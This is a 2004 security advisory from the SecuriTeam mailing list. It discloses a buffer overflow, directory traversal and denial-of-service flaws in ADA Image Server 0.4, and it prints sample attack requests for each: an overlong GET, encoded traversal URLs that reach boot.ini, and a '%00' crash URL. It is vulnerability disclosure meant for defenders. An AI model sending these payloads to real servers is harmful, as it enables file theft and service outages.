Related information

ADA Image Server multiple bugs

From:	SECURITEAM <support_(at)_securiteam.com>
Date:	16.04.2004
Subject:	[NT] ADA Image Server (ImgSvr) Multiple Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site:
http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



 ADA Image Server (ImgSvr) Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

<http://sourceforge.net/projects/adaimgsvr/> ADA Image Server is "an
embedded web server that is specialized in photo album publishing. This
Image server provides an HTTP based access to image content. It generate
dynamic pages from a standard directory based hierarchy, manage
thumbnails, metadatas". Multiple security vulnerabilities have been found
in the product these include buffer overflow in GET request, directory
traversal vulnerabilities, and DoS vulnerabilities.

DETAILS

Vulnerable Systems:
* ADA Image Server (ImgSvr) version 0.4

Buffer Overflow in GET / request:
There is a buffer overflow in ADA image server that occurs whenever an
attacker sends a GET request followed by 2,112 characters. An attacker may
exploit this vulnerability to make your web server crash or even execute
arbitrary code:
Get /[2,112 chars] http/1.0

Directory Traversal Vulnerabilities
The vulnerability occurs whenever an attacker uses the pattern
"%2f%2e%2e%2f", as these are not properly checked for directory traversal,
an attacker can download any file that resides outside the bounding HTML
root directory:
http://[host]:
1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2
e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini

Or view the directories content:
http://[host]:1234/%2f%2e%2e%2f%2f%2e%2e%2f/

Denial of Service:
By supplying a "%00" in the URL, a remote user can crash the server using
the following request:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.
exe/imgsvr.exe/imgsvr.exe
/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.
exe/imgsvr.exe/imgsvr.exe
/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.
exe/imgsvr.exe/imgsvr.exe/


ADDITIONAL INFORMATION

The information has been provided by  <mailto:dr_insane@pathfinder.gr>
dr_insane.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of
business profits or special damages.